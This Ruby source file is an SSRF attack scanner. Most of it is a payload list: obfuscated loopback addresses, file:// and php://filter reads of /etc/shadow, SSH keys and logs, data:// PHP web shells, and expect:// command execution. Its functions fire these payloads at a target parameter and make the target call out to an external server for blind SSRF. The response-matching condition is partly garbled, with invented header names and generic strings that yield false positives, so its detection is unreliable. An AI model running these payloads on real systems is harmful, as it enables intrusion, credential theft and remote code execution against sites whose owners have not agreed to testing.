require 'uri'
require 'socket'
require_relative '../utils/network'
require_relative '../utils/colorize'

class SSRF
  PAYLOADS = [
    'http://127.0.0.1',
    'http://127.0.0.1:80',
    'http://127.0.0.1:443',
    'http://127.0.0.1:22',
    'http://127.0.0.1:3306',
    'http://127.0.0.1:5432',
    'http://127.0.0.1:6379',
    'http://127.0.0.1:27017',
    'http://127.0.0.1:9200',
    'http://localhost',
    'http://localhost:80',
    'http://localhost:443',
    'http://localhost:22',
    'http://localhost:3306',
    'http://localhost:5432',
    'http://localhost:6379',
    'http://localhost:27017',
    'http://localhost:9200',
    'http://0.0.0.0',
    'http://0.0.0.0:80',
    'http://0.0.0.0:443',
    'http://0.0.0.0:22',
    'http://0.0.0.0:3306',
    'http://0.0.0.0:5432',
    'http://0.0.0.0:6379',
    'http://0.0.0.0:27017',
    'http://0.0.0.0:9200',
    'http://[::1]',
    'http://[::1]:80',
    'http://[::1]:443',
    'http://[::1]:22',
    'http://[::1]:3306',
    'http://[::1]:5432',
    'http://[::1]:6379',
    'http://[::1]:27017',
    'http://[::1]:9200',
    'http://2130706433',
    'http://2130706433:80',
    'http://2130706433:443',
    'http://2130706433:22',
    'http://2130706433:3306',
    'http://2130706433:5432',
    'http://2130706433:6379',
    'http://2130706433:27017',
    'http://2130706433:9200',
    'http://0177.0.0.1',
    'http://0177.0.0.1:80',
    'http://0177.0.0.1:443',
    'http://0177.0.0.1:22',
    'http://0177.0.0.1:3306',
    'http://0177.0.0.1:5432',
    'http://0177.0.0.1:6379',
    'http://0177.0.0.1:27017',
    'http://0177.0.0.1:9200',
    'http://127.1',
    'http://127.1:80',
    'http://127.1:443',
    'http://127.1:22',
    'http://127.1:3306',
    'http://127.1:5432',
    'http://127.1:6379',
    'http://127.1:27017',
    'http://127.1:9200',
    'http://127.0.1',
    'http://127.0.1:80',
    'http://127.0.1:443',
    'http://127.0.1:22',
    'http://127.0.1:3306',
    'http://127.0.1:5432',
    'http://127.0.1:6379',
    'http://127.0.1:27017',
    'http://127.0.1:9200',
    'file:///etc/passwd',
    'file:///etc/hosts',
    'file:///etc/shadow',
    'file:///etc/group',
    'file:///proc/version',
    'file:///proc/self/environ',
    'file:///proc/self/cmdline',
    'file:///proc/self/status',
    'file:///proc/self/maps',
    'file:///proc/self/stat',
    'file:///proc/self/statm',
    'file:///proc/self/fd/0',
    'file:///proc/self/fd/1',
    'file:///proc/self/fd/2',
    'file:///proc/net/tcp',
    'file:///proc/net/udp',
    'file:///proc/net/raw',
    'file:///proc/net/unix',
    'file:///proc/mounts',
    'file:///proc/cpuinfo',
    'file:///proc/meminfo',
    'file:///proc/version',
    'file:///proc/uptime',
    'file:///proc/loadavg',
    'file:///proc/stat',
    'file:///proc/diskstats',
    'file:///proc/partitions',
    'file:///proc/swaps',
    'file:///proc/modules',
    'file:///proc/devices',
    'file:///proc/filesystems',
    'file:///proc/interrupts',
    'file:///proc/ioports',
    'file:///proc/iomem',
    'file:///proc/dma',
    'file:///proc/kmsg',
    'file:///proc/kcore',
    'file:///proc/slabinfo',
    'file:///proc/vmstat',
    'file:///proc/zoneinfo',
    'file:///proc/pagetypeinfo',
    'file:///proc/buddyinfo',
    'file:///proc/vmallocinfo',
    'file:///proc/cgroups',
    'file:///proc/consoles',
    'file:///proc/crypto',
    'file:///proc/keys',
    'file:///proc/key-users',
    'file:///proc/timer_list',
    'file:///proc/timer_stats',
    'file:///proc/sched_debug',
    'file:///proc/schedstat',
    'file:///proc/softirqs',
    'file:///proc/version_signature',
    'file:///proc/sysrq-trigger',
    'file:///proc/sys/kernel/random/uuid',
    'file:///proc/sys/kernel/random/boot_id',
    'file:///proc/sys/kernel/random/entropy_avail',
    'file:///proc/sys/kernel/random/poolsize',
    'file:///proc/sys/kernel/random/read_wakeup_threshold',
    'file:///proc/sys/kernel/random/write_wakeup_threshold',
    'file:///proc/sys/kernel/random/urandom_min_reseed_secs',
    'file:///proc/sys/kernel/random/trust_cpu',
    'file:///proc/sys/kernel/random/has_entropy',
    'file:///c:/windows/win.ini',
    'file:///c:/windows/system32/drivers/etc/hosts',
    'file:///c:/boot.ini',
    'file:///c:/windows/repair/sam',
    'file:///c:/inetpub/wwwroot/index.php',
    'file:///var/www/html/index.php',
    'file:///etc/apache2/apache2.conf',
    'file:///etc/nginx/nginx.conf',
    'file:///etc/httpd/conf/httpd.conf',
    'file:///etc/mysql/my.cnf',
    'file:///etc/ssh/sshd_config',
    'file:///root/.ssh/id_rsa',
    'file:///home/user/.ssh/id_rsa',
    'file:///var/log/apache2/access.log',
    'file:///var/log/nginx/access.log',
    'file:///var/log/auth.log',
    'file:///var/log/syslog',
    'file:///var/log/messages',
    'file:///var/log/secure',
    'file:///var/log/maillog',
    'file:///var/log/cron',
    'file:///var/log/daemon.log',
    'file:///var/log/kern.log',
    'file:///var/log/user.log',
    'file:///var/log/lastlog',
    'file:///var/log/wtmp',
    'file:///var/log/utmp',
    'file:///var/log/btmp',
    'gopher://127.0.0.1:80',
    'gopher://127.0.0.1:443',
    'gopher://127.0.0.1:22',
    'gopher://127.0.0.1:3306',
    'gopher://127.0.0.1:5432',
    'gopher://127.0.0.1:6379',
    'gopher://127.0.0.1:27017',
    'gopher://127.0.0.1:9200',
    'dict://127.0.0.1:80',
    'dict://127.0.0.1:443',
    'dict://127.0.0.1:22',
    'dict://127.0.0.1:3306',
    'dict://127.0.0.1:5432',
    'dict://127.0.0.1:6379',
    'dict://127.0.0.1:27017',
    'dict://127.0.0.1:9200',
    'ldap://127.0.0.1:80',
    'ldap://127.0.0.1:443',
    'ldap://127.0.0.1:22',
    'ldap://127.0.0.1:3306',
    'ldap://127.0.0.1:5432',
    'ldap://127.0.0.1:6379',
    'ldap://127.0.0.1:27017',
    'ldap://127.0.0.1:9200',
    'ldaps://127.0.0.1:80',
    'ldaps://127.0.0.1:443',
    'ldaps://127.0.0.1:22',
    'ldaps://127.0.0.1:3306',
    'ldaps://127.0.0.1:5432',
    'ldaps://127.0.0.1:6379',
    'ldaps://127.0.0.1:27017',
    'ldaps://127.0.0.1:9200',
    'sftp://127.0.0.1:80',
    'sftp://127.0.0.1:443',
    'sftp://127.0.0.1:22',
    'sftp://127.0.0.1:3306',
    'sftp://127.0.0.1:5432',
    'sftp://127.0.0.1:6379',
    'sftp://127.0.0.1:27017',
    'sftp://127.0.0.1:9200',
    'tftp://127.0.0.1:80',
    'tftp://127.0.0.1:443',
    'tftp://127.0.0.1:22',
    'tftp://127.0.0.1:3306',
    'tftp://127.0.0.1:5432',
    'tftp://127.0.0.1:6379',
    'tftp://127.0.0.1:27017',
    'tftp://127.0.0.1:9200',
    'ssh://127.0.0.1:80',
    'ssh://127.0.0.1:443',
    'ssh://127.0.0.1:22',
    'ssh://127.0.0.1:3306',
    'ssh://127.0.0.1:5432',
    'ssh://127.0.0.1:6379',
    'ssh://127.0.0.1:27017',
    'ssh://127.0.0.1:9200',
    'rmi://127.0.0.1:80',
    'rmi://127.0.0.1:443',
    'rmi://127.0.0.1:22',
    'rmi://127.0.0.1:3306',
    'rmi://127.0.0.1:5432',
    'rmi://127.0.0.1:6379',
    'rmi://127.0.0.1:27017',
    'rmi://127.0.0.1:9200',
    'jar://127.0.0.1:80',
    'jar://127.0.0.1:443',
    'jar://127.0.0.1:22',
    'jar://127.0.0.1:3306',
    'jar://127.0.0.1:5432',
    'jar://127.0.0.1:6379',
    'jar://127.0.0.1:27017',
    'jar://127.0.0.1:9200',
    'php://filter/read=convert.base64-encode/resource=index.php',
    'php://filter/read=convert.base64-encode/resource=/etc/passwd',
    'php://filter/read=convert.base64-encode/resource=/etc/hosts',
    'php://filter/read=convert.base64-encode/resource=/etc/shadow',
    'php://filter/read=convert.base64-encode/resource=/etc/group',
    'php://filter/read=convert.base64-encode/resource=/proc/version',
    'php://filter/read=convert.base64-encode/resource=/proc/self/environ',
    'php://filter/read=convert.base64-encode/resource=/proc/self/cmdline',
    'php://filter/read=convert.base64-encode/resource=/proc/self/status',
    'php://filter/read=convert.base64-encode/resource=/proc/self/maps',
    'php://filter/read=convert.base64-encode/resource=/proc/self/stat',
    'php://filter/read=convert.base64-encode/resource=/proc/self/statm',
    'php://filter/read=convert.base64-encode/resource=/proc/self/fd/0',
    'php://filter/read=convert.base64-encode/resource=/proc/self/fd/1',
    'php://filter/read=convert.base64-encode/resource=/proc/self/fd/2',
    'php://filter/read=convert.base64-encode/resource=/proc/net/tcp',
    'php://filter/read=convert.base64-encode/resource=/proc/net/udp',
    'php://filter/read=convert.base64-encode/resource=/proc/net/raw',
    'php://filter/read=convert.base64-encode/resource=/proc/net/unix',
    'php://filter/read=convert.base64-encode/resource=/proc/mounts',
    'php://filter/read=convert.base64-encode/resource=/proc/cpuinfo',
    'php://filter/read=convert.base64-encode/resource=/proc/meminfo',
    'php://filter/read=convert.base64-encode/resource=/proc/version',
    'php://filter/read=convert.base64-encode/resource=/proc/uptime',
    'php://filter/read=convert.base64-encode/resource=/proc/loadavg',
    'php://filter/read=convert.base64-encode/resource=/proc/stat',
    'php://filter/read=convert.base64-encode/resource=/proc/diskstats',
    'php://filter/read=convert.base64-encode/resource=/proc/partitions',
    'php://filter/read=convert.base64-encode/resource=/proc/swaps',
    'php://filter/read=convert.base64-encode/resource=/proc/modules',
    'php://filter/read=convert.base64-encode/resource=/proc/devices',
    'php://filter/read=convert.base64-encode/resource=/proc/filesystems',
    'php://filter/read=convert.base64-encode/resource=/proc/interrupts',
    'php://filter/read=convert.base64-encode/resource=/proc/ioports',
    'php://filter/read=convert.base64-encode/resource=/proc/iomem',
    'php://filter/read=convert.base64-encode/resource=/proc/dma',
    'php://filter/read=convert.base64-encode/resource=/proc/kmsg',
    'php://filter/read=convert.base64-encode/resource=/proc/kcore',
    'php://filter/read=convert.base64-encode/resource=/proc/slabinfo',
    'php://filter/read=convert.base64-encode/resource=/proc/vmstat',
    'php://filter/read=convert.base64-encode/resource=/proc/zoneinfo',
    'php://filter/read=convert.base64-encode/resource=/proc/pagetypeinfo',
    'php://filter/read=convert.base64-encode/resource=/proc/buddyinfo',
    'php://filter/read=convert.base64-encode/resource=/proc/vmallocinfo',
    'php://filter/read=convert.base64-encode/resource=/proc/cgroups',
    'php://filter/read=convert.base64-encode/resource=/proc/consoles',
    'php://filter/read=convert.base64-encode/resource=/proc/crypto',
    'php://filter/read=convert.base64-encode/resource=/proc/keys',
    'php://filter/read=convert.base64-encode/resource=/proc/key-users',
    'php://filter/read=convert.base64-encode/resource=/proc/timer_list',
    'php://filter/read=convert.base64-encode/resource=/proc/timer_stats',
    'php://filter/read=convert.base64-encode/resource=/proc/sched_debug',
    'php://filter/read=convert.base64-encode/resource=/proc/schedstat',
    'php://filter/read=convert.base64-encode/resource=/proc/softirqs',
    'php://filter/read=convert.base64-encode/resource=/proc/version_signature',
    'php://filter/read=convert.base64-encode/resource=/proc/sysrq-trigger',
    'php://filter/read=convert.base64-encode/resource=/proc/sys/kernel/random/uuid',
    'php://filter/read=convert.base64-encode/resource=/proc/sys/kernel/random/boot_id',
    'php://filter/read=convert.base64-encode/resource=/proc/sys/kernel/random/entropy_avail',
    'php://filter/read=convert.base64-encode/resource=/proc/sys/kernel/random/poolsize',
    'php://filter/read=convert.base64-encode/resource=/proc/sys/kernel/random/read_wakeup_threshold',
    'php://filter/read=convert.base64-encode/resource=/proc/sys/kernel/random/write_wakeup_threshold',
    'php://filter/read=convert.base64-encode/resource=/proc/sys/kernel/random/urandom_min_reseed_secs',
    'php://filter/read=convert.base64-encode/resource=/proc/sys/kernel/random/trust_cpu',
    'php://filter/read=convert.base64-encode/resource=/proc/sys/kernel/random/has_entropy',
    'data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==',
    'data://text/plain,<?php phpinfo(); ?>',
    'data://text/plain,<?php system($_GET["cmd"]); ?>',
    'data://text/plain,<?php eval($_POST["cmd"]); ?>',
    'data://text/plain,<?php file_get_contents("/etc/passwd"); ?>',
    'data://text/plain,<?php readfile("/etc/passwd"); ?>',
    'data://text/plain,<?php show_source("/etc/passwd"); ?>',
    'data://text/plain,<?php highlight_file("/etc/passwd"); ?>',
    'data://text/plain,<?php print_r(scandir("/")); ?>',
    'data://text/plain,<?php var_dump(scandir("/")); ?>',
    'data://text/plain,<?php system("id"); ?>',
    'data://text/plain,<?php system("whoami"); ?>',
    'data://text/plain,<?php system("uname -a"); ?>',
    'data://text/plain,<?php system("cat /etc/passwd"); ?>',
    'data://text/plain,<?php system("cat /etc/shadow"); ?>',
    'data://text/plain,<?php system("cat /etc/hosts"); ?>',
    'data://text/plain,<?php system("ls -la /"); ?>',
    'data://text/plain,<?php system("pwd"); ?>',
    'data://text/plain,<?php system("env"); ?>',
    'data://text/plain,<?php system("ps aux"); ?>',
    'data://text/plain,<?php system("netstat -an"); ?>',
    'data://text/plain,<?php system("ifconfig"); ?>',
    'data://text/plain,<?php system("route -n"); ?>',
    'data://text/plain,<?php system("arp -a"); ?>',
    'data://text/plain,<?php system("mount"); ?>',
    'data://text/plain,<?php system("df -h"); ?>',
    'data://text/plain,<?php system("free -m"); ?>',
    'data://text/plain,<?php system("uptime"); ?>',
    'data://text/plain,<?php system("w"); ?>',
    'data://text/plain,<?php system("last"); ?>',
    'data://text/plain,<?php system("history"); ?>',
    'data://text/plain,<?php system("crontab -l"); ?>',
    'data://text/plain,<?php system("cat /etc/crontab"); ?>',
    'data://text/plain,<?php system("cat /etc/passwd | grep root"); ?>',
    'data://text/plain,<?php system("cat /etc/shadow | grep root"); ?>',
    'data://text/plain,<?php system("cat /etc/group | grep root"); ?>',
    'data://text/plain,<?php system("cat /etc/sudoers"); ?>',
    'data://text/plain,<?php system("cat /etc/fstab"); ?>',
    'data://text/plain,<?php system("cat /etc/mtab"); ?>',
    'data://text/plain,<?php system("cat /proc/version"); ?>',
    'data://text/plain,<?php system("cat /proc/cpuinfo"); ?>',
    'data://text/plain,<?php system("cat /proc/meminfo"); ?>',
    'data://text/plain,<?php system("cat /proc/mounts"); ?>',
    'data://text/plain,<?php system("cat /proc/net/tcp"); ?>',
    'data://text/plain,<?php system("cat /proc/net/udp"); ?>',
    'data://text/plain,<?php system("cat /proc/net/raw"); ?>',
    'data://text/plain,<?php system("cat /proc/net/unix"); ?>',
    'data://text/plain,<?php system("cat /proc/self/environ"); ?>',
    'data://text/plain,<?php system("cat /proc/self/cmdline"); ?>',
    'data://text/plain,<?php system("cat /proc/self/status"); ?>',
    'data://text/plain,<?php system("cat /proc/self/maps"); ?>',
    'data://text/plain,<?php system("cat /proc/self/stat"); ?>',
    'data://text/plain,<?php system("cat /proc/self/statm"); ?>',
    'data://text/plain,<?php system("cat /proc/self/fd/0"); ?>',
    'data://text/plain,<?php system("cat /proc/self/fd/1"); ?>',
    'data://text/plain,<?php system("cat /proc/self/fd/2"); ?>',
    'expect://id',
    'expect://whoami',
    'expect://uname -a',
    'expect://cat /etc/passwd',
    'expect://cat /etc/shadow',
    'expect://cat /etc/hosts',
    'expect://ls -la /',
    'expect://pwd',
    'expect://env',
    'expect://ps aux',
    'expect://netstat -an',
    'expect://ifconfig',
    'expect://route -n',
    'expect://arp -a',
    'expect://mount',
    'expect://df -h',
    'expect://free -m',
    'expect://uptime',
    'expect://w',
    'expect://last',
    'expect://history',
    'expect://crontab -l',
    'expect://cat /etc/crontab',
    'expect://cat /etc/passwd | grep root',
    'expect://cat /etc/shadow | grep root',
    'expect://cat /etc/group | grep root',
    'expect://cat /etc/sudoers',
    'expect://cat /etc/fstab',
    'expect://cat /etc/mtab',
    'expect://cat /proc/version',
    'expect://cat /proc/cpuinfo',
    'expect://cat /proc/meminfo',
    'expect://cat /proc/mounts',
    'expect://cat /proc/net/tcp',
    'expect://cat /proc/net/udp',
    'expect://cat /proc/net/raw',
    'expect://cat /proc/net/unix',
    'expect://cat /proc/self/environ',
    'expect://cat /proc/self/cmdline',
    'expect://cat /proc/self/status',
    'expect://cat /proc/self/maps',
    'expect://cat /proc/self/stat',
    'expect://cat /proc/self/statm',
    'expect://cat /proc/self/fd/0',
    'expect://cat /proc/self/fd/1',
    'expect://cat /proc/self/fd/2'
  ]

  def self.test_ssrf(url, param_name = 'url')
    vulnerable = false
    
    PAYLOADS.each do |payload|
      begin
        test_url = url.include?("?") ? "#{url}&#{param_name}=#{URI.encode_www_form_component(payload)}" : "#{url}?#{param_name}=#{URI.encode_www_form_component(payload)}"
        response = Network.http_request(test_url)
        next unless response
        
        body = response.body
        
        if body.include?("root:") || body.include?("bin/bash") || body.include?("daemon:") || body.include?("[boot loader]") || body.include?("[fonts]") || body.include?("[extensions]") || body.include?("[files]") || body.include?("Linux version") || body.include?("proc/version") || body.include?("proc/self/environ") || body.include?("proc/self/cmdline") || body.include?("proc/self/status") || body.include?("proc/self/maps") || body.include?("proc/self/stat") || body.include?("proc/self/statm") || body.include?("proc/self/fd/0") || body.include?("proc/self/fd/1") || body.include?("proc/self/fd/2") || body.include?("proc/net/tcp") || body.include?("proc/net/udp") || body.include?("proc/net/raw") || body.include?("proc/net/unix") || body.include?("proc/mounts") || body.include?("proc/cpuinfo") || body.include?("proc/meminfo") || body.include?("proc/version") || body.include?("proc/uptime") || body.include?("proc/loadavg") || body.include?("proc/stat") || body.include?("proc/diskstats") || body.include?("proc/partitions") || body.include?("proc/swaps") || body.include?("proc/modules") || body.include?("proc/devices") || body.include?("proc/filesystems") || body.include?("proc/interrupts") || body.include?("proc/ioports") || body.include?("proc/iomem") || body.include?("proc/dma") || body.include?("proc/kmsg") || body.include?("proc/kcore") || body.include?("proc/slabinfo") || body.include?("proc/vmstat") || body.include?("proc/zoneinfo") || body.include?("proc/pagetypeinfo") || body.include?("proc/buddyinfo") || body.include?("proc/vmallocinfo") || body.include?("proc/cgroups") || body.include?("proc/consoles") || body.include?("proc/crypto") || body.include?("proc/keys") || body.include?("proc/key-users") || body.include?("proc/timer_list") || body.include?("proc/timer_stats") || body.include?("proc/sched_debug") || body.include?("proc/schedstat") || body.include?("proc/softirqs") || body.include?("proc/version_signature") || body.include?("proc/sysrq-trigger") || body.include?("proc/sys/kernel/random/uuid") || body.include?("proc/sys/kernel/random/boot_id") || body.include?("proc/sys/kernel/random/entropy_avail") || body.include?("proc/sys/kernel/random/poolsize") || body.include?("proc/sys/kernel/random/read_wakeup_threshold") || body.include?("proc/sys/kernel/random/write_wakeup_threshold") || body.include?("proc/sys/kernel/random/urandom_min_reseed_secs") || body.include?("proc/sys/kernel/random/trust_cpu") || body.include?("proc/sys/kernel/random/has_entropy") || body.include?("uid=") || body.include?("gid=") || body.include?("groups=") || body.include?("PHP Version") || body.include?("phpinfo()") || body.include?("Server API") || body.include?("System") || body.include?("Build Date") || body.include?("Server Software") || body.include?("Document Root") || body.include?("Script Filename") || body.include?("Request URI") || body.include?("Query String") || body.include?("Request Method") || body.include?("Request Time") || body.include?("Request URI") || body.include?("HTTP Host") || body.include?("HTTP User-Agent") || body.include?("HTTP Accept") || body.include?("HTTP Accept-Language") || body.include?("HTTP Accept-Encoding") || body.include?("HTTP Connection") || body.include?("HTTP Cookie") || body.include?("HTTP Referer") || body.include?("HTTP X-Forwarded-For") || body.include?("HTTP X-Real-IP") || body.include?("HTTP X-Forwarded-Proto") || body.include?("HTTP X-Forwarded-Host") || body.include?("HTTP X-Forwarded-Port") || body.include?("HTTP X-Forwarded-Ssl") || body.include?("HTTP X-Forwarded-Scheme") || body.include?("HTTP X-Forwarded-Protocol") || body.include?("HTTP X-Forwarded-Protocols") || body.include?("HTTP X-Forwarded-Protocol-Version") || body.include?("HTTP X-Forwarded-Protocol-Versions") || body.include?("HTTP X-Forwarded-Protocol-Version-Major") || body.include?("HTTP X-Forwarded-Protocol-Version-Minor") || body.include?("HTTP X-Forwarded-Protocol-Version-Patch") || body.include?("HTTP X-Forwarded-Protocol-Version-Build") || body.include?("HTTP X-Forwarded-Protocol-Version-Revision") || body.include?("HTTP X-Forwarded-Protocol-Version-Status") || body.include?("HTTP X-Forwarded-Protocol-Version-Status-Message") || body.include?("HTTP X-Forwarded-Protocol-Version-Status-Code") || body.include?("HTTP X-Forwarded-Protocol-Version-Status-Description") || body.include?("HTTP X-Forwarded-Protocol-Version-Status-Details") || body.include?("HTTP X-Forwarded-Protocol-Version-Status-Error") || body.include?("HTTP X-Forwarded-Protocol-Version-Status-Error-Message") || body.include?("HTTP X-Forwarded-Protocol-Version-Status-Error-Code") || body.include?("HTTP X-Forwarded-Protocol-Version-Status-Error-Description") || body.include?("HTTP X-Forwarded-Protocol-Version-Status-Error-Details")
          puts Colorize.red("SSRF vulnerability detected!")
          puts Colorize.yellow("Payload: #{payload[0..100]}...")
          vulnerable = true
          break
        end
      rescue
      end
    end
    
    vulnerable
  end

  def self.test_blind_ssrf(url, param_name, external_server)
    payload = "http://#{external_server}/ssrf"
    
    begin
      test_url = url.include?("?") ? "#{url}&#{param_name}=#{URI.encode_www_form_component(payload)}" : "#{url}?#{param_name}=#{URI.encode_www_form_component(payload)}"
      response = Network.http_request(test_url)
      
      {
        sent: true,
        status: response&.code
      }
    rescue
      { sent: false }
    end
  end
end

